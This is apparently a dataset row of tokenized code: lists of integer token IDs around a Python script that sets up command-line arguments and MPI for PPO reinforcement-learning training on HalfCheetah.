220,
220,
220,
366,
33221,
7904,
10442,
7712,
7904,
46267,
7904,
11361,
3401,
5028,
1600,
198,
220,
220,
220,
220,
220,
220,
220,
366,
5317,
1631,
7591,
1240,
7904,
34152,
1600,
198,
220,
220,
220,
16589,
198,
220,
220,
220,
1628,
62,
6371,
82,
34758,
198,
220,
220,
220,
220,
220,
220,
220,
705,
24941,
341,
10354,
705,
5450,
1378,
732,
1443,
5459,
12,
16366,
13,
961,
83,
704,
420,
82,
13,
952,
14,
3256,
198,
220,
220,
220,
220,
220,
220,
220,
705,
7416,
10354,
705,
5450,
1378,
12567,
13,
785,
14,
732,
1443,
5459,
12,
16366,
14,
732,
1443,
5459,
12,
16366,
14,
3256,
198,
220,
220,
220,
8964,
198,
220,
220,
220,
26286,
11639,
732,
1443,
11603,
5456,
3256,
198,
220,
220,
220,
5726,
62,
13033,
34758,
198,
220,
220,
220,
220,
220,
220,
220,
705,
41947,
62,
46521,
10354,
685,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
705,
18504,
39455,
28,
732,
1443,
5459,
13557,
18504,
39455,
25,
12417,
3256,
198,
220,
220,
220,
220,
220,
220,
220,
16589,
198,
220,
220,
220,
8964,
198,
220,
220,
220,
2721,
62,
47911,
28,
17350,
62,
47911,
11,
198,
220,
220,
220,
10392,
28,
19796,
62,
43789,
22784,
198,
220,
220,
220,
5301,
62,
7890,
34758,
198,
220,
220,
220,
220,
220,
220,
220,
705,
732,
1443,
5459,
13,
41989,
10354,
37250,
7890,
15211,
13,
14116,
20520,
198,
220,
220,
220,
8964,
198,
220,
220,
220,
5254,
62,
46115,
28,
41989,
62,
46115,
11,
198,
220,
220,
220,
1332,
62,
2385,
578,
2625,
732,
1443,
5459,
13,
41989,
1,
198,
8,
198
] | 2.733122 | 948 |
import numpy as np
import argparse, gym, time, os
import os.path as osp
import torch
import torch.nn as nn
import torch.optim as optim
from on_policy.utils import core
from on_policy.utils.model import ActorCritic
from on_policy.utils.replay_buffer import ReplayBuffer
from utils.logx import EpochLogger
from utils.run_utils import setup_logger_kwargs
from utils.mpi_tools import mpi_fork, num_procs, mpi_avg, proc_id
if __name__ == '__main__':
parser = argparse.ArgumentParser()
""" env """
parser.add_argument('--env', type=str, default='HalfCheetah-v2')
parser.add_argument('--epochs', type=int, default=50)
parser.add_argument('--steps_per_epoch', type=int, default=4000)
parser.add_argument('--max_ep_len', type=int, default=1000)
parser.add_argument('--train_pi_iters', type=int,default=80)
parser.add_argument('--train_v_iters', type=int, default=80)
parser.add_argument('--save_freq', type=int, default=5)
""" algorithm """
parser.add_argument('--gamma', type=float, default=0.99)
parser.add_argument('--lam', type=float, default=0.95)
parser.add_argument('--clip_ratio', type=float, default=0.2)
parser.add_argument('--target_kl', type=float, default=0.01)
parser.add_argument('--actor_lr', type=float, default=1e-4)
parser.add_argument('--critic_lr', type=float, default=1e-3)
""" others """
parser.add_argument('--seed', '-s', type=int, default=0)
parser.add_argument('--exp_name', type=str, default='ppo')
parser.add_argument('--cpu', type=int, default=2)
args = parser.parse_args()
# run parallel code with mpi
mpi_fork(args.cpu)
logger_kwargs = setup_logger_kwargs(args.exp_name, args.seed)
# Save model path
fpath = osp.join(logger_kwargs['output_dir'], 'models')
ppo = PPO()
ppo.run()
| [
11748,
299,
32152,
355,
45941,
201,
198,
11748,
1822,
29572,
11,
11550,
11,
640,
11,
28686,
201,
198,
11748,
28686,
13,
6978,
355,
267,
2777,
201,
198,
11748,
28034,
201,
198,
11748,
28034,
13,
20471,
355,
299,
77,
201,
198,
11748,
28034,
13,
40085,
355,
6436,
201,
198,
6738,
319,
62,
30586,
13,
26791,
1330,
4755,
201,
198,
6738,
319,
62,
30586,
13,
26791,
13,
19849,
1330,
27274,
18559,
291,
201,
198,
6738,
319,
62,
30586,
13,
26791,
13,
260,
1759,
62,
22252,
1330,
23635,
28632,
201,
198,
6738,
3384,
4487,
13,
6404,
87,
1330,
4551,
5374,
11187,
1362,
201,
198,
6738,
3384,
4487,
13,
5143,
62,
26791,
1330,
9058,
62,
6404,
1362,
62,
46265,
22046,
201,
198,
6738,
3384,
4487,
13,
3149,
72,
62,
31391,
1330,
285,
14415,
62,
32523,
11,
997,
62,
1676,
6359,
11,
285,
14415,
62,
615,
70,
11,
13834,
62,
312,
201,
198,
201,
198,
201,
198,
201,
198,
361,
11593,
3672,
834,
6624,
705,
834,
12417,
834,
10354,
201,
198,
201,
198,
220,
220,
220,
30751,
796,
1822,
29572,
13,
28100,
1713,
46677,
3419,
201,
198,
220,
220,
220,
37227,
220,
17365,
220,
37227,
201,
198,
220,
220,
220,
30751,
13,
2860,
62,
49140,
10786,
438,
24330,
3256,
2099,
28,
2536,
11,
4277,
11639,
31305,
7376,
316,
993,
12,
85,
17,
11537,
201,
198,
220,
220,
220,
30751,
13,
2860,
62,
49140,
10786,
438,
538,
5374,
82,
3256,
2099,
28,
600,
11,
4277,
28,
1120,
8,
201,
198,
220,
220,
220,
30751,
13,
2860,
62,
49140,
10786,
438,
20214,
62,
525,
62,
538,
5374,
3256,
2099,
28,
600,
11,
4277,
28,
27559,
8,
201,
198,
220,
220,
220,
30751,
13,
2860,
62,
49140,
10786,
438,
9806,
62,
538,
62,
11925,
3256,
2099,
28,
600,
11,
4277,
28,
12825,
8,
201,
198,
220,
220,
220,
30751,
13,
2860,
62,
49140,
10786,
438,
27432,
62,
14415,
62,
270,
364,
3256,
2099,
28,
600,
11,
12286,
28,
1795,
8,
201,
198,
220,
220,
220,
30751,
13,
2860,
62,
49140,
10786,
438,
27432,
62,
85,
62,
270,
364,
3256,
2099,
28,
600,
11,
4277,
28,
1795,
8,
201,
198,
220,
220,
220,
30751,
13,
2860,
62,
49140,
10786,
438,
21928,
62,
19503,
80,
3256,
2099,
28,
600,
11,
4277,
28,
20,
8,
201,
198,
220,
220,
220,
37227,
220,
11862,
220,
37227,
201,
198,
220,
220,
220,
30751,
13,
2860,
62,
49140,
10786,
438,
28483,
2611,
3256,
2099,
28,
22468,
11,
4277,
28,
15,
13,
2079,
8,
201,
198,
220,
220,
220,
30751,
13,
2860,
62,
49140,
10786,
438,
2543,
3256,
2099,
28,
22468,
11,
4277,
28,
15,
13,
3865,
8,
201,
198,
220,
220,
220,
30751,
13,
2860,
62,
49140,
10786,
438,
15036,
62,
10366,
952,
3256,
2099,
28,
22468,
11,
4277,
28,
15,
13,
17,
8,
201,
198,
220,
220,
220,
30751,
13,
2860,
62,
49140,
10786,
438,
16793,
62,
41582,
3256,
2099,
28,
22468,
11,
4277,
28,
15,
13,
486,
8,
201,
198,
220,
220,
220,
30751,
13,
2860,
62,
49140,
10786,
438,
11218,
62,
14050,
3256,
2099,
28,
22468,
11,
4277,
28,
16,
68,
12,
19,
8,
201,
198,
220,
220,
220,
30751,
13,
2860,
62,
49140,
10786,
438,
22213,
291,
62,
14050,
3256,
2099,
28,
22468,
11,
4277,
28,
16,
68,
12,
18,
8,
201,
198,
201,
198,
220,
220,
220,
37227,
220,
1854,
220,
37227,
201,
198,
220,
220,
220,
30751,
13,
2860,
62,
49140,
10786,
438,
28826,
3256,
705,
12,
82,
3256,
2099,
28,
600,
11,
4277,
28,
15,
8,
201,
198,
220,
220,
220,
30751,
13,
2860,
62,
49140,
10786,
438,
11201,
62,
3672,
3256,
2099,
28,
2536,
11,
4277,
11639,
16634,
11537,
201,
198,
220,
220,
220,
30751,
13,
2860,
62,
49140,
10786,
438,
36166,
3256,
2099,
28,
600,
11,
4277,
28,
17,
8,
201,
198,
201,
198,
220,
220,
220,
26498,
796,
30751,
13,
29572,
62,
22046,
3419,
201,
198,
201,
198,
220,
220,
220,
1303,
1057,
10730,
2438,
351,
285,
14415,
201,
198,
220,
220,
220,
285,
14415,
62,
32523,
7,
22046,
13,
36166,
8,
201,
198,
220,
220,
220,
49706,
62,
46265,
22046,
796,
9058,
62,
6404,
1362,
62,
46265,
22046,
7,
22046,
13,
11201,
62,
3672,
11,
26498,
13,
28826,
8,
201,
198,
201,
198,
220,
220,
220,
1303,
12793,
2746,
3108,
201,
198,
220,
220,
220,
277,
6978,
796,
267,
2777,
13,
22179,
7,
6404,
1362,
62,
46265,
22046,
17816,
22915,
62,
15908,
6,
4357,
705,
27530,
11537,
201,
198,
201,
198,
220,
220,
220,
279,
7501,
796,
350,
16402,
3419,
201,
198,
220,
220,
220,
279,
7501,
13,
5143,
3419,
201,
198
] | 2.474308 | 759 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.